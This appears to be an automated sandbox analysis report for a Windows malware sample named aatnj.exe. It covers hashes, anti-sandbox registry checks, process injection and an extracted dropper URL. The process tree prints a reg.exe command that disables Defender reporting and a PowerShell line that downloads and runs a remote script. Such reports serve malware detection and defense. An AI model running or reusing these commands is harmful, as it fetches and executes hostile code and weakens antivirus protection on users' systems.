Analysis
-
max time kernel
9s -
max time network
13s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28-12-2020 18:58
Static task
static1
Behavioral task
behavioral1
Sample
aatnj.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
aatnj.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
aatnj.exe
-
Size
39.5MB
-
MD5
2cf766692a75309734b08b3bd8cc36df
-
SHA1
a003224582db124237e8c879d795aefe8d23b22b
-
SHA256
1ee6f8e9bbc53afa81c39326d5748c6c4322d2501c42adcb34f5b71bc34ae48b
-
SHA512
a28bf5af4c30152bd89d23e5295e9a6faa23eac6f312d7841bfb4664fe725bf42fed2fe4bb65c164709d6aa98a5ff66cbb78ed86396be975d2aeb1386afcda2c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://www.allens-treasure-house.com/books_files/001.ps1
Signatures
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
aatnj.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 aatnj.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc aatnj.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service aatnj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 aatnj.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc aatnj.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service aatnj.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
aatnj.exeaatnj.exepowershell.exepid process 648 aatnj.exe 648 aatnj.exe 1524 aatnj.exe 1524 aatnj.exe 1524 aatnj.exe 1524 aatnj.exe 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2532 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
aatnj.exedescription pid process target process PID 648 wrote to memory of 1524 648 aatnj.exe aatnj.exe PID 648 wrote to memory of 1524 648 aatnj.exe aatnj.exe PID 648 wrote to memory of 1524 648 aatnj.exe aatnj.exe PID 648 wrote to memory of 760 648 aatnj.exe reg.exe PID 648 wrote to memory of 760 648 aatnj.exe reg.exe PID 648 wrote to memory of 2532 648 aatnj.exe powershell.exe PID 648 wrote to memory of 2532 648 aatnj.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aatnj.exe"C:\Users\Admin\AppData\Local\Temp\aatnj.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\aatnj.exe"C:\Users\Admin\AppData\Local\Temp\aatnj.exe" /C2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\xswbnvwzoqhexknsvyncuisejgi.txt'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/760-4-0x0000000000000000-mapping.dmp
-
memory/1524-2-0x0000000000000000-mapping.dmp
-
memory/1524-3-0x00000000027C0000-0x00000000027C1000-memory.dmpFilesize
4KB
-
memory/2532-5-0x0000000000000000-mapping.dmp
-
memory/2532-6-0x00007FF91E230000-0x00007FF91EC1C000-memory.dmpFilesize
9.9MB
-
memory/2532-7-0x0000018FA5200000-0x0000018FA5201000-memory.dmpFilesize
4KB
-
memory/2532-8-0x0000018FA7D30000-0x0000018FA7D31000-memory.dmpFilesize
4KB